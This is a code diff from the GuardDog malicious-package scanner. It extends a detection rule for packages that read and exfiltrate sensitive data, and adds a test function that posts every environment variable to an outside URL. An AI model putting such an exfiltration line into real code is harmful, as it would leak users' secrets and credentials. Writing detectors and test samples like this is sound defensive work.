DataDog · ikretz · Oct 25, 2024 · Oct 25, 2024 · Oct 25, 2024
diff --git a/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml b/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml
@@ -5,7 +5,7 @@ rules:
     metadata:
       description: Identify when a package reads and exfiltrates sensitive data from the local system
     pattern-sources:
-      - pattern: os.environ.items()
+      - pattern: os.environ
       - pattern: '[... for ... in os.environ.items()]'
       - pattern: socket.gethostname()
       - pattern: getpass.getuser()

diff --git a/tests/analyzer/sourcecode/exfiltrate-sensitive-data.py b/tests/analyzer/sourcecode/exfiltrate-sensitive-data.py
@@ -172,6 +172,13 @@ def checkVersion():
 req.read()
 
 
+def leak_env_vars():
+    env_vars = os.environ
+    url = "https://www.datadoghq.com/"
+    # ruleid: exfiltrate-sensitive-data
+    requests.post(url, json=dict(env_vars))
+
+
 """ RULEID: CTX
 """